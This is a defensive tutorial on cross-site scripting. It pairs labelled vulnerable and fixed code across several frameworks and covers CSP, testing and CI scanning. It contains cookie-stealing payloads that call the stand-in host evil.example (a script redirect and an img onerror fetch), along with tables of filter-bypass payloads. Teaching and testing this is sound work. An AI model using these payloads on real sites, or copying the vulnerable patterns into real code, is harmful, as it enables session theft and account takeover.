Understanding and Mitigating Cross-Site Scripting (XSS)
Introduction
Cross-Site Scripting (XSS) is a pervasive vulnerability that affects web applications by allowing attackers to inject malicious scripts into trusted websites. These scripts execute in the context of unsuspecting users’ browsers, leading to stolen session cookies, compromised accounts, and other harmful actions. Despite being well-documented, XSS remains one of the most common security risks, ranking prominently in the OWASP Top 10 vulnerabilities.
This article explores the different types of XSS, their implications, and effective strategies to identify and prevent these attacks, ensuring your web applications remain secure.
What is Cross-Site Scripting (XSS)?
XSS is a type of injection attack that targets web applications where user input is not properly validated or sanitized. Attackers exploit these flaws to inject malicious scripts that execute in the victim’s browser. The payloads are typically written in JavaScript, though attackers can also inject raw HTML or, in legacy browsers, scripts in languages such as VBScript.
Types of XSS
- Stored XSS:
- Malicious scripts are permanently stored on the server (e.g., in a database or file system) and served to users whenever they access the affected page.
- Example: A malicious comment containing a script is saved in a blog post’s database and executed whenever the post is viewed.
- Reflected XSS:
- The malicious script is reflected off the server and included in the response to a user’s request. This often occurs via query parameters or form submissions.
- Example: A search feature displays the input query directly on the page without sanitizing it, allowing an attacker to inject a script.
- DOM-based XSS:
- The vulnerability exists entirely in the client-side code, where scripts manipulate the Document Object Model (DOM) based on untrusted input.
- Example: A script dynamically updates a web page using a URL fragment without validating or escaping it.
The Impact of XSS Attacks
XSS attacks can have severe consequences for both users and organizations. Some of the common impacts include:
- Session Hijacking:
- Attackers can steal session cookies, allowing them to impersonate users.
- Data Theft:
- Malicious scripts can capture sensitive information, such as login credentials or personal data, entered by users.
- Account Compromise:
- By stealing tokens or credentials, attackers can gain unauthorized access to user accounts.
- Reputation Damage:
- If an application is known to have XSS vulnerabilities, it erodes user trust and damages the organization’s reputation.
- Regulatory Non-Compliance:
- XSS vulnerabilities that lead to data breaches may result in penalties under laws like GDPR or HIPAA.
Identifying XSS Vulnerabilities
1. Manual Testing
- Input Fields:
- Test all user input fields by injecting payloads such as <script>alert('XSS')</script>.
- URLs:
- Include scripts in query parameters or fragments to see if they are executed.
- Form Submissions:
- Submit forms with malicious payloads and observe the server’s response.
2. Automated Tools
- Burp Suite:
- Scans for XSS vulnerabilities and provides detailed reports.
- OWASP ZAP:
- Identifies XSS risks through active and passive scanning.
3. Code Review
- Review server-side and client-side code for unsafe handling of user input.
- Focus on areas where data is directly included in HTML output without sanitization or encoding.
Preventing Cross-Site Scripting
The most effective way to prevent XSS is to ensure that all user input is properly validated, sanitized, and encoded before being processed or displayed.
1. Input Validation
- Whitelist Inputs:
- Define strict rules for acceptable input formats. For example, restrict usernames to alphanumeric characters.
- Reject Dangerous Input:
- Disallow special characters like <, >, and " unless explicitly required.
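The allowlist approach can be sketched in a few lines. The function names and the exact patterns below are illustrative, not prescriptive — adapt the rules to your own input formats:

```javascript
// Allowlist validation: accept only known-good formats, reject everything else.
function isValidUsername(input) {
  // Alphanumeric plus underscore, 3–20 characters
  return /^[A-Za-z0-9_]{3,20}$/.test(input)
}

function isValidEmail(input) {
  // Deliberately strict and simplified — not full RFC 5322,
  // but it rejects the characters XSS payloads depend on
  return /^[^\s@<>"']+@[^\s@<>"']+\.[A-Za-z]{2,}$/.test(input)
}
```

Because the patterns describe what is allowed rather than what is forbidden, an attacker cannot sneak a payload past them with an encoding trick the blocklist author never anticipated.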
2. Output Encoding
Encode all data before displaying it in a browser to ensure it is treated as plain text rather than executable code.
Example (JavaScript):
function encodeHTML(str) {
  return str
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;')
}
3. Use Content Security Policy (CSP)
A CSP restricts the sources from which scripts can be executed. This minimizes the risk of executing malicious scripts even if they are injected.
Example (CSP Header):
Content-Security-Policy: script-src 'self' https://trusted.cdn.com
4. Sanitize User Input
Remove or escape potentially harmful characters from input. Use libraries like DOMPurify for sanitizing HTML content.
Example (DOMPurify in JavaScript):
const clean = DOMPurify.sanitize(dirtyInput)
5. Avoid Inline JavaScript
Do not use inline event handlers like onclick or embed JavaScript directly in HTML. Use external scripts instead, as they are easier to manage and secure.
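As a minimal before/after sketch (the save-btn id and function names are hypothetical), the inline handler moves into an external script that attaches it programmatically — which also keeps the page compatible with a CSP that omits 'unsafe-inline':

```javascript
// ❌ Inline (in HTML): <button onclick="save()">Save</button>
// ✅ External script: attach the handler via addEventListener.
// The document object is passed in so the wiring is testable.
function wireSaveButton(doc, onSave) {
  const btn = doc.getElementById('save-btn')
  if (btn) btn.addEventListener('click', onSave)
  return btn
}

// In the browser: wireSaveButton(document, save)
```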
Real-World Example of XSS Mitigation
Consider an online comment system where users can post comments that are displayed on the webpage. A poorly implemented system might directly insert user input into the HTML, creating a vulnerability.
Vulnerable Code (PHP):
echo "<p>$user_comment</p>";
Secure Code:
- Sanitize Input:
- Remove any harmful characters from the comment before saving it.
- Encode Output:
- Use htmlspecialchars to encode the comment before displaying it.
Example:
echo "<p>" . htmlspecialchars($user_comment, ENT_QUOTES, 'UTF-8') . "</p>";
Testing for Secure Implementation
Once mitigation techniques are in place, test the application to ensure XSS vulnerabilities have been addressed. Use tools like:
- Manual Testing: Re-inject payloads to confirm they are neutralized.
- Automated Scanners: Verify that common XSS patterns are no longer executable.
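The manual re-test can itself be scripted as a regression check: push a known payload through your encoder and assert that no executable markup survives. A minimal sketch, reusing an entity-encoding helper like the one shown earlier (names illustrative):

```javascript
// Entity-encode the characters HTML injection depends on
function encodeHTML(str) {
  return str
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;')
}

// A payload is neutralized if no raw angle brackets remain in the output
function isNeutralized(renderedOutput) {
  return !/<|>/.test(renderedOutput)
}

const payload = "<script>alert('XSS')</script>"
const rendered = encodeHTML(payload)
```

Running this check in CI for every output path gives early warning if someone later swaps the encoder for unescaped interpolation.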
XSS Attack Flows Visualized
Before diving deeper into remediation, it helps to understand exactly how each XSS variant travels from attacker to victim. The three attack patterns differ fundamentally in how the payload is delivered, where it is stored, and where it executes.
Reflected XSS Flow
In reflected XSS, the payload exists only inside a crafted URL or a form submission. The attacker delivers that link to the victim — often via phishing email, forum post, or a redirect — and the server bounces the unescaped input back in the HTML response.
sequenceDiagram
participant A as Attacker
participant V as Victim
participant S as Web Server
A->>V: Sends crafted URL containing malicious payload
V->>S: Clicks link — GET /search?q=<script>stealCookies()</script>
S->>V: Response echoes the unsanitized query in HTML
Note over V: Browser parses response and executes injected script
V->>A: Session token exfiltrated to attacker-controlled server
Because the payload is never written to a database, reflected XSS is sometimes called non-persistent XSS. However, it is far from harmless — a single successful phishing campaign can steal session tokens from thousands of users within minutes.
Stored XSS Flow
Stored XSS — also known as persistent XSS — is the most dangerous variant. The attacker writes the payload into a data store, and it then executes for every subsequent visitor who loads the affected page, often without any further attacker interaction.
sequenceDiagram
participant A as Attacker
participant S as Web Server
participant DB as Database
participant V as Victim
A->>S: POST /comments — submits payload as content
S->>DB: Stores payload without sanitization
V->>S: GET /post/42 — loads page with comments
S->>DB: Fetches stored comments
DB->>S: Returns payload
S->>V: Serves page with embedded malicious script
Note over V: Script executes automatically for every visitor
V->>A: Credentials or tokens sent to attacker
A malicious comment on a popular article can silently compromise thousands of users before a security team notices anything unusual. This is why stored XSS vulnerabilities are typically rated Critical in bug bounty programmes.
DOM-Based XSS Flow
DOM-based XSS is unique because the server response itself is benign. The vulnerability lives entirely in client-side JavaScript that reads from an attacker-controllable source and writes into a dangerous sink — and may never touch the server at all.
sequenceDiagram
participant A as Attacker
participant V as Victim
participant B as Browser / DOM
A->>V: Sends URL with malicious fragment — example.com/page#<img onerror=...>
V->>B: Navigates to URL; HTTP response is safe
Note over B: Client-side JS reads location.hash
B->>B: Writes hash value into innerHTML or calls eval()
Note over B: Script executes entirely in the browser
V->>A: Data exfiltrated without payload ever passing through server
DOM XSS is frequently missed by server-side scanners and WAFs because the dangerous payload never appears in the HTTP request body. Detecting it requires instrumented browser analysis tools such as Burp Suite’s DOM Invader.
Deep Dive: Reflected XSS
Reflected XSS vulnerabilities are extraordinarily common because the failure mode is simple: the application outputs user-supplied data without encoding it. Search pages, error messages, form validation feedback, and URL parameters are prime candidates. The fix is equally straightforward when you know what to look for.
Vulnerable Node.js / Express Example
// ❌ Vulnerable — user input interpolated directly into HTML
app.get('/search', (req, res) => {
const query = req.query.q
res.send(`
<html>
<body>
<h1>Results for: ${query}</h1>
</body>
</html>
`)
})
An attacker crafts the following URL and persuades the victim to click it:
https://example.com/search?q=<script>
document.location='https://evil.example/steal?c='+document.cookie
</script>
The value of query is inserted into the response without encoding. The browser’s HTML parser encounters the <script> tag and executes it immediately, exfiltrating the victim’s session cookie.
Secure Fix
import he from 'he' // npm install he
// ✅ Secure — HTML-encode the query before interpolation
app.get('/search', (req, res) => {
const query = he.encode(String(req.query.q ?? ''))
res.send(`
<html>
<body>
<h1>Results for: ${query}</h1>
</body>
</html>
`)
})
The he.encode() call converts < to &lt;, > to &gt;, and " to &quot;. The browser renders those entities as visible characters rather than interpreting them as HTML tags. Most server-side template engines (Handlebars, Pug, Nunjucks, Jinja2) auto-escape by default — the risk comes from using unescaped interpolation syntax: {{{ }}} in Handlebars, != in Pug, or | safe in Jinja2.
Common Reflected XSS Entry Points
| Entry Point | Example Parameter | Notes |
|---|---|---|
| Search query | ?q= | Highest frequency in reports |
| Error messages | ?error= | Often reflects the raw input |
| Redirect / return URL | ?next= | Also enables open redirect |
| Username in greetings | ?name= | Common in marketing pages |
| HTTP Referer header | (server-reflected) | Often overlooked by scanners |
| Pagination offsets | ?page= | Usually numeric — easy bypass if not validated |
One often-overlooked vector is the HTTP Referer header or other custom request headers that the server reflects back into the HTML response. Automated scanners typically focus on URL parameters and form fields, so always include header-injection tests in your manual testing checklist.
Deep Dive: Stored XSS
Stored XSS is harder to catch with automated tools because the injection and the execution happen in separate HTTP requests. The scanner may miss the connection between writing a payload to the database and reading it back in a different context.
Classic Attack Scenario
Consider a social platform where users can write a public profile bio:
// ❌ Vulnerable — storing raw HTML
app.post('/api/profile', async (req, res) => {
const { bio } = req.body
await db.query('UPDATE users SET bio = ? WHERE id = ?', [bio, req.user.id])
res.json({ success: true })
})
// ❌ Vulnerable — rendering raw HTML to visitors
app.get('/profile/:id', async (req, res) => {
const [user] = await db.query('SELECT bio FROM users WHERE id = ?', [req.params.id])
res.send(`<div class="bio">${user.bio}</div>`)
})
An attacker sets their bio to:
<img src="x" onerror="fetch('https://evil.example/steal?c='+encodeURIComponent(document.cookie))" />
Every visitor who loads the attacker’s profile page silently sends their cookies to the attacker’s server. On a popular platform this payload can run thousands of times before anyone notices.
Secure Fix
When users need to submit formatted content, use DOMPurify on the server side to strip everything dangerous while preserving safe markup:
import createDOMPurify from 'dompurify'
import { JSDOM } from 'jsdom'
const window = new JSDOM('').window
const DOMPurify = createDOMPurify(window)
// ✅ Secure — sanitize on the way in
app.post('/api/profile', async (req, res) => {
const cleanBio = DOMPurify.sanitize(req.body.bio, {
ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'a', 'p', 'ul', 'ol', 'li'],
ALLOWED_ATTR: ['href']
})
await db.query('UPDATE users SET bio = ? WHERE id = ?', [cleanBio, req.user.id])
res.json({ success: true })
})
If rich HTML is not required at all, reject it entirely — store the value as plain text and HTML-encode on output. This is the safest option whenever a WYSIWYG editor is not part of the feature.
Deep Dive: DOM-Based XSS
DOM-based XSS requires understanding JavaScript execution paths rather than HTTP request/response pairs. In modern single-page applications that manipulate the DOM in response to URL state or API data, it is the most common form of XSS encountered during real-world penetration tests.
Sources and Sinks
DOM XSS flows from sources — attacker-controlled entry points into client-side code — into sinks — operations that act on that data in a dangerous way.
Common sources:
- location.href, location.hash, location.search
- document.referrer
- postMessage event data
- window.localStorage, window.sessionStorage
- document.cookie
Dangerous sinks:
- innerHTML, outerHTML, insertAdjacentHTML()
- document.write(), document.writeln()
- eval(), new Function(), setTimeout(string), setInterval(string)
- location.href = untrustedData (enables javascript: URLs)
- jQuery’s $(untrustedData), .html(), .append() with HTML strings
Vulnerable Example
// URL: https://example.com/welcome#<img src=x onerror=alert(document.cookie)>
// ❌ Vulnerable — reads location.hash and writes to innerHTML
const fragment = decodeURIComponent(location.hash.slice(1))
document.getElementById('greeting').innerHTML = `Welcome back, ${fragment}!`
The decodeURIComponent call is particularly dangerous here because it will decode %3Cscript%3E back into <script>, bypassing any naive string-based filter that looked for the literal < character.
Secure Fix
// ✅ Secure — use textContent; it never interprets markup
const fragment = decodeURIComponent(location.hash.slice(1))
document.getElementById('greeting').textContent = `Welcome back, ${fragment}!`
// ✅ If HTML rendering is genuinely needed, sanitize first
import DOMPurify from 'dompurify'
document.getElementById('greeting').innerHTML = DOMPurify.sanitize(`Welcome back, ${fragment}!`)
textContent is the simplest and safest fix — it treats everything as a raw string and never parses HTML. Prefer it over innerHTML any time the content does not need to render formatted markup.
Vulnerable vs. Secure Code Patterns
The following side-by-side comparisons cover the most frequently encountered XSS-prone patterns across different languages and contexts.
Pattern 1: Building HTML via String Concatenation
// ❌ Vulnerable
function renderUsername(name) {
document.body.innerHTML += '<h2>Hello, ' + name + '!</h2>'
}
// ✅ Secure — create elements programmatically
function renderUsername(name) {
const h2 = document.createElement('h2')
h2.textContent = `Hello, ${name}!`
document.body.appendChild(h2)
}
Pattern 2: jQuery HTML Methods
jQuery’s .html() and .append() with HTML strings both invoke the browser’s HTML parser, making them equivalent to innerHTML assignment.
// ❌ Vulnerable
$('#message').html(userInput)
$('#container').append('<li>' + userInput + '</li>')
// ✅ Secure
$('#message').text(userInput)
$('#container').append($('<li>').text(userInput))
Pattern 3: Server-Side Template Literals (Node.js / TypeScript)
import express, { Request, Response } from 'express'
import he from 'he'
const app = express()
// ❌ Vulnerable
app.get('/greet', (req: Request, res: Response) => {
const name = req.query.name as string
res.send(`<p>Hello, ${name}</p>`)
})
// ✅ Secure
app.get('/greet', (req: Request, res: Response) => {
const name = he.encode(String(req.query.name ?? 'guest'))
res.send(`<p>Hello, ${name}</p>`)
})
Pattern 4: href Attribute Assigned from User Input
A javascript: URL in an href attribute will execute when the link is clicked. Always validate the scheme before assigning it to a link element.
// ❌ Vulnerable
const link = document.createElement('a')
link.href = userProvidedUrl // could be javascript:alert(1)
// ✅ Secure — only allow http and https
function setSafeHref(anchor, rawUrl) {
try {
const parsed = new URL(rawUrl, window.location.origin)
if (['http:', 'https:'].includes(parsed.protocol)) {
anchor.href = parsed.href
} else {
anchor.removeAttribute('href')
}
} catch {
anchor.removeAttribute('href') // invalid URL
}
}
Pattern 5: SSR State Injection (Next.js / Express)
Embedding application state in a <script> tag via JSON serialization is a standard SSR pattern, but JSON.stringify does not escape </script> sequences — a payload containing </script><script>alert(1)</script> inside a JSON string can break out of the script block.
// ❌ Vulnerable — JSON.stringify does not escape </script>
const html = `<script>window.__DATA__ = ${JSON.stringify(serverData)}</script>`
// ✅ Secure — use serialize-javascript which escapes </script> and other dangerous sequences
import serialize from 'serialize-javascript'
const html = `<script>window.__DATA__ = ${serialize(serverData)}</script>`
Content Security Policy: In-Depth Configuration
Content Security Policy (CSP) is an HTTP response header that instructs the browser which origins are permitted to load and execute resources. A well-crafted CSP is one of the most effective second layers of defense against XSS — even if an attacker successfully injects a script, the browser will refuse to run it if the policy forbids it.
How CSP Works
The browser enforces CSP before executing any resource loaded in the response. A strong baseline policy for a typical web application looks like this:
Content-Security-Policy:
default-src 'self';
script-src 'self' https://cdn.example.com;
style-src 'self' 'unsafe-inline';
img-src 'self' data: https:;
font-src 'self';
object-src 'none';
base-uri 'self';
form-action 'self';
frame-ancestors 'none';
upgrade-insecure-requests;
Key directives to understand:
- default-src 'self' — Allow resources only from the same origin by default. All other directives override this for their specific resource type.
- script-src 'self' — Restrict scripts to your own origin; list any trusted CDNs explicitly.
- object-src 'none' — Block Flash and all plugin-based vectors entirely.
- base-uri 'self' — Prevents attackers from injecting a <base> tag that redirects all relative URL resolutions.
- form-action 'self' — Ensures forms can only submit to your own origin, blocking data exfiltration via form hijacking.
- frame-ancestors 'none' — Equivalent to X-Frame-Options: DENY; prevents clickjacking.
Nonces for Inline Scripts
The most secure CSPs avoid 'unsafe-inline' entirely. When inline scripts cannot be eliminated, use per-request nonces:
import crypto from 'crypto'
// Middleware generates a fresh nonce for every response
app.use((req, res, next) => {
res.locals.nonce = crypto.randomBytes(16).toString('base64')
res.setHeader(
'Content-Security-Policy',
`script-src 'nonce-${res.locals.nonce}' 'strict-dynamic'; object-src 'none'; base-uri 'self';`
)
next()
})
<!-- Template uses the nonce on every legitimate inline script -->
<script nonce="<%= nonce %>">
initApp() // allowed
</script>
<!-- An attacker's injected script has no nonce and is blocked -->
<script>
stealCookies()
</script>
The 'strict-dynamic' keyword extends trust from the nonce-bearing script to any scripts it dynamically creates, which makes it compatible with modern bundlers that split code into lazy-loaded chunks.
CSP in Report-Only Mode
Before enforcing a new policy on production traffic, run it in report-only mode to catch both real violations and legitimate resources you forgot to allow:
Content-Security-Policy-Report-Only: default-src 'self'; report-uri /csp-violations
Violations are sent as JSON POST requests to your endpoint. Once you have confirmed that no legitimate traffic is affected, change the header name to Content-Security-Policy to start enforcing it.
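With the legacy report-uri directive, the browser POSTs a JSON body shaped like { "csp-report": { ... } }. A small parser sketch for the violation endpoint — the field names follow that report format, while the function name is illustrative:

```javascript
// Extract the fields worth logging from a CSP violation report body.
// The browser sends { "csp-report": { "document-uri": ..., ... } }.
function summarizeCspReport(body) {
  const report = JSON.parse(body)['csp-report'] || {}
  return {
    page: report['document-uri'],
    directive: report['violated-directive'],
    blocked: report['blocked-uri'],
  }
}

// Example body as a browser would send it
const example = JSON.stringify({
  'csp-report': {
    'document-uri': 'https://example.com/page',
    'violated-directive': 'script-src',
    'blocked-uri': 'https://evil.example/x.js',
  },
})
```

Feed the summaries into your logging pipeline and alert on spikes — a sudden burst of script-src violations from many clients is a strong signal of an active injection attempt.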
What CSP Cannot Replace
CSP is defense in depth, not a substitute for output encoding. It can frequently be bypassed when the policy allows broad CDN domains: a policy with script-src ajax.googleapis.com is exploitable via old Angular versions hosted on that domain. Nor does it prevent DOM-based XSS when the dangerous sink lives inside a script that legitimately carries a trusted nonce. Output encoding, HTML sanitization, and proper DOM API usage remain the primary defenses.
Framework-Specific XSS Prevention
Modern JavaScript frameworks reduce XSS risk by default, but every framework has escape hatches that reintroduce the vulnerability if used with untrusted data.
React
React automatically HTML-encodes all values interpolated with JSX curly braces. The following is safe regardless of what username contains:
const username = '<script>alert(1)</script>'
return <p>Hello, {username}!</p>
// Rendered HTML source: Hello, &lt;script&gt;alert(1)&lt;/script&gt;!
React-specific pitfalls:
1. dangerouslySetInnerHTML — the name is an intentional warning. Never pass unsanitized data to it:
// ❌ Dangerous
<div dangerouslySetInnerHTML={{ __html: userBio }} />
// ✅ Safe
import DOMPurify from 'dompurify'
<div dangerouslySetInnerHTML={{ __html: DOMPurify.sanitize(userBio) }} />
2. javascript: URLs in href — React does not validate href values. Always enforce protocol allowlisting:
// ❌ Dangerous
<a href={userProvidedUrl}>Profile</a>
// ✅ Safe
const isSafeUrl = (url: string): boolean => /^https?:\/\//i.test(url)
<a href={isSafeUrl(userProvidedUrl) ? userProvidedUrl : '#'}>Profile</a>
3. SSR data injection — when rendering the initial page with Next.js or a custom Express SSR setup, serialize state safely:
// ❌ JSON.stringify does not escape </script>
const html = `<script>window.__INITIAL_STATE__=${JSON.stringify(state)}</script>`
// ✅ serialize-javascript escapes </script> and unicode control sequences
import serialize from 'serialize-javascript'
const html = `<script>window.__INITIAL_STATE__=${serialize(state)}</script>`
Angular
Angular’s template engine escapes all values bound with {{ }} and attribute bindings by default. Bypass functions in DomSanitizer must be treated with extreme caution:
import { DomSanitizer, SafeHtml, SecurityContext } from '@angular/platform-browser';
// ❌ Dangerous — disables all sanitization for the given HTML
bypassAndRender(html: string): SafeHtml {
return this.sanitizer.bypassSecurityTrustHtml(html);
}
// ✅ Safe — Angular's own sanitizer strips dangerous content
sanitizeAndRender(html: string): string {
return this.sanitizer.sanitize(SecurityContext.HTML, html) ?? '';
}
Never call any bypassSecurityTrust* method with user-controlled content. Angular provides these methods exclusively for pre-reviewed, developer-authored HTML — not user input.
Vue
Vue auto-escapes values in {{ }} template interpolations. The v-html directive is the primary XSS vector:
<!-- ❌ Dangerous — v-html renders raw HTML without escaping -->
<div v-html="userContent"></div>
<!-- ✅ Safe — sanitize first using DOMPurify -->
<script setup lang="ts">
import { computed } from 'vue'
import DOMPurify from 'dompurify'
const props = defineProps<{ userContent: string }>()
const safeContent = computed(() => DOMPurify.sanitize(props.userContent))
</script>
<div v-html="safeContent"></div>
For Vue SSR with Nuxt.js, use the devalue library instead of JSON.stringify when serializing state into the page — it handles circular references and prevents </script> injection vectors that JSON.stringify misses.
Common Mistakes and Anti-Patterns
Knowing what not to do is just as important as knowing best practices. The following mistakes appear regularly in code reviews and bug bounty submissions.
Mistake 1: Blocklist Filtering Instead of Output Encoding
Blocking specific tags like <script> is trivially bypassed with event handler attributes or alternative tags:
// ❌ Easily bypassed — attacker uses <img onerror=...> instead
const unsafe = input.replace(/<script>/gi, '').replace(/<\/script>/gi, '')
// An attacker submits: <img src=x onerror="stealCookies()">
// The filter does nothing; the payload survives
// ✅ Encode everything — safe by construction
import he from 'he'
const safe = he.encode(input)
Mistake 2: Trusting the Referer Header
The Referer header is fully controlled by the attacker. Reflecting it in a response creates a stored or reflected XSS vector:
// ❌ Vulnerable
echo "You came from: " . $_SERVER['HTTP_REFERER'];
// ✅ Safe — never reflect request headers directly into HTML
// Log them server-side if needed; never render them to users
Mistake 3: Client-Side-Only Input Validation
Browser-side validation can be completely bypassed by sending a raw HTTP request with curl, Burp Suite, or any scripting language. Always enforce validation on the server regardless of what the front end does:
<!-- ❌ Relies entirely on the browser -->
<input type="text" pattern="[A-Za-z0-9]+" oninput="this.setCustomValidity('')" required />
<!-- The attacker simply sends a POST request directly to the endpoint -->
Validate all inputs server-side using an allowlist (permitted characters or formats), and treat client-side validation as a UX enhancement only.
Mistake 4: Using eval() with Any User-Controlled Data
Any call to eval(), new Function(), setTimeout(string), or setInterval(string) with user-controlled data is a remote code execution risk, not just an XSS risk:
// ❌ Remote code execution — never pass user input to eval
const formula = req.query.formula
const result = eval(formula)
// ✅ Use a purpose-built sandboxed evaluator for dynamic expressions
import { evaluate } from 'mathjs'
const result = evaluate(formula) // restricted to math operations
Mistake 5: Assuming Sanitization at Write Time is Sufficient
Sanitizing on the way into the database is a good practice, but it is not a substitute for encoding on output. The context at render time determines which encoding rules apply. Data that is safe to render in a <div> body may still be dangerous inside a <script> block or a CSS value. Always encode for the specific rendering context, regardless of how the data was stored.
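The context point can be made concrete with two illustrative helpers: an HTML-body encoding that is inert inside element content does nothing to protect a script block, which needs its own escaping rule:

```javascript
// HTML-body encoding: safe for element content, NOT for <script> blocks
function htmlEncode(str) {
  return str.replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/>/g, '&gt;')
}

// JavaScript string escaping: what a single-quoted script-context sink
// needs instead. Escaping < as \x3C blocks the </script> breakout.
function jsStringEscape(str) {
  return str
    .replace(/\\/g, '\\\\')
    .replace(/'/g, "\\'")
    .replace(/</g, '\\x3C')
}

const stored = "</script><script>alert(1)</script>"
// Safe between <div> and </div>:
const inDiv = htmlEncode(stored)
// Placing the raw value inside <script>'...'</script> would terminate
// the script block; the JS-string escape prevents that:
const inScript = jsStringEscape(stored)
```

The same stored value needs both helpers, applied at the moment of rendering, depending on where it lands.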
Mistake 6: Using innerHTML to “Clone” Text
Developers sometimes use element.innerHTML = otherElement.innerHTML to copy content between DOM nodes. If the source element was populated from user input — even through a “safe” path — the copy operation can reintroduce an XSS vector:
// ❌ Copies raw HTML, which may contain injected content
targetElement.innerHTML = sourceElement.innerHTML
// ✅ Clone the DOM node itself (preserves structure, sanitization already applied)
targetElement.innerHTML = ''
targetElement.appendChild(sourceElement.cloneNode(true))
Advanced Testing for XSS
Thorough XSS testing requires going far beyond the classic <script>alert(1)</script> payload. Real-world defenses often block obvious signatures while leaving more creative vectors completely open.
Manual Testing Strategy
Step 1 — Map all input entry points. Identify every location where user-supplied data enters the application: URL parameters, path segments, form fields, HTTP headers (User-Agent, Referer, X-Forwarded-For, Cookie names), WebSocket messages, and postMessage handlers.
Step 2 — Inject a unique probe string. Insert a distinctive marker such as xsstest99abc into each entry point and search the rendered HTML response for where it appears. This reveals the rendering context (HTML body, attribute value, JavaScript string, CSS property) without triggering WAF alerts.
Step 3 — Choose a context-appropriate payload. Each rendering context requires a different breakout technique:
| Rendering Context | Breakout Technique |
|---|---|
| HTML body | <script>alert(1)</script> or <img src=x onerror=alert(1)> |
| Quoted HTML attribute | " onmouseover="alert(1) |
| Unquoted HTML attribute | onmouseover=alert(1) x= |
| JavaScript string (single-quoted) | '; alert(1)// |
| JavaScript template literal | ${alert(1)} |
| URL in href/src | javascript:alert(1) |
| CSS value | expression(alert(1)) (legacy IE) |
Step 4 — Test filter bypass techniques. If basic payloads are blocked, try:
- Case variation: <ScRiPt>alert(1)</sCrIpT>
- HTML entities in attribute context: &#111;nerror (the browser decodes entities inside attribute values)
- Double URL encoding: %253Cscript%253E
- Null bytes to break parser context: <scri\x00pt>
- Tag without closing bracket: <script/XSS src=data:,alert(1)>
- Unicode escapes inside scripts: \u003cscript\u003ealert(1)\u003c/script\u003e
Automated Tools
Burp Suite Pro is the gold standard for XSS scanning. Its active scanner applies hundreds of context-aware payloads and detects reflected, stored, and — with DOM Invader — DOM-based XSS with high reliability. Configure it with your authenticated session cookie to cover all authenticated endpoints.
OWASP ZAP is the leading open-source alternative. It supports active scanning, fuzzing, and a scriptable automation API that integrates cleanly into CI/CD pipelines. ZAP’s AJAX Spider crawls single-page applications that ZAP’s standard spider would otherwise miss.
DOM Invader (bundled with Burp Suite’s embedded Chromium browser) specifically targets DOM-based XSS by instrumenting the browser to track taint flow from sources to sinks in client-side JavaScript — a capability that purely HTTP-based scanners fundamentally cannot replicate.
Semgrep provides static analysis XSS rules that run at the code level before the application is deployed:
# Run the OWASP Top 10 rule set, which includes XSS patterns
semgrep --config p/owasp-top-ten src/
Integrating XSS Scanning into CI/CD
Catching XSS regressions before they reach production is far cheaper than fixing a live vulnerability. Run a DAST scan against your staging environment on every pull request that modifies template files, route handlers, or DOM manipulation code:
# .github/workflows/security.yml
name: Security Scan
on:
pull_request:
paths:
- 'src/**/*.js'
- 'src/**/*.ts'
- 'views/**'
- 'templates/**'
jobs:
dast:
runs-on: ubuntu-latest
steps:
- name: OWASP ZAP Baseline Scan
uses: zaproxy/[email protected]
with:
target: 'https://staging.example.com'
rules_file_name: '.zap/rules.tsv'
fail_action: true # treat findings as build failures
Set XSS findings of medium severity or higher as build-breaking failures. Lower severity findings can be tracked in your issue tracker for prioritized remediation. This approach ensures that a new feature cannot ship if it accidentally introduces an injection point, and it builds a culture of security awareness into the normal development workflow.
XSS in Modern API-Driven Applications
The shift toward single-page applications (SPAs) backed by JSON APIs has changed the XSS threat landscape in meaningful ways. Traditional server-rendered applications had a relatively clear separation between the data layer and the presentation layer — HTML was built on the server, so encoding happened there. In API-driven applications, the browser constructs the HTML using raw data fetched from API endpoints, which shifts the encoding responsibility entirely to the client-side JavaScript code. This is a harder problem to solve consistently.
Consider a React front end that fetches a list of user posts from a REST API and renders them in a feed. The API returns JSON, which React components display as JSX. If the component uses normal JSX interpolation ({post.content}), React handles encoding automatically, and XSS is prevented. But if a developer notices that some content uses basic Markdown or HTML formatting and decides to render it with dangerouslySetInnerHTML to “fix” the display, a reflected or stored XSS vulnerability is instantly reintroduced — and it may not be obvious to reviewers scanning the code quickly.
GraphQL APIs introduce an additional consideration: the rich querying capability that makes GraphQL attractive also makes it easier for attackers to extract deeply nested, unsanitized string fields that might not have been individually tested. When a field like bio or comment was never designed to hold markup but a developer later starts rendering it as HTML on a specific page, an existing stored payload in that field suddenly becomes exploitable even though neither the API nor the database changed.
WebSockets deserve special attention in XSS contexts because they establish long-lived bidirectional channels that bypass many of the request-level validation controls developers rely on. A WebSocket message handler that directly writes received data into the DOM — for example, to implement a real-time chat feature — is an unguarded stored XSS sink if the server relays user-generated content without sanitization. Unlike HTTP responses, WebSocket messages are not covered by most traditional WAF rulesets, so they often receive less scrutiny during security reviews.
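To make the distinction concrete, here is a hedged sketch of a chat message handler. The message shape, DOM ids, and the formatSender helper are illustrative assumptions, not a real API; the point is that relayed content goes into the DOM as text, never as markup.

```javascript
// Hypothetical chat handler sketch: insert relayed content as text, never
// as markup. formatSender and the DOM structure are illustrative.
function formatSender(user) {
  // allowlist the display name; fall back to a neutral label otherwise
  return /^[A-Za-z0-9_ ]{1,32}$/.test(String(user)) ? user : 'user';
}

// In the browser (sketch):
// socket.onmessage = (event) => {
//   const { user, text } = JSON.parse(event.data);
//   const li = document.createElement('li');
//   li.textContent = `${formatSender(user)}: ${text}`; // text, not innerHTML
//   document.querySelector('#chat').appendChild(li);
// };
```

Using textContent (rather than innerHTML) means the browser never parses the message as HTML, which closes the sink regardless of what the server relays.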
When building applications with server-sent events (SSE), postMessage, or broadcast channel APIs, the same principle applies: any data flowing from an external origin or a user into the DOM must be treated as untrusted and sanitized or encoded before being rendered. The novelty of the transport mechanism does not change the fundamental rule.
API responses that include HTML in JSON fields (for example, a CMS delivery API that returns rich text as HTML) are a particularly tricky case. There is often no way to know at render time how thoroughly the content was sanitized when it was authored. The correct approach is to sanitize it again on the front end — DOMPurify is fast enough that even sanitizing hundreds of rich-text fields on a single page is not a performance concern. Double sanitization is always safe; double encoding can break rendering, but double sanitization merely ensures that any content that slipped through one pass is caught by the next.
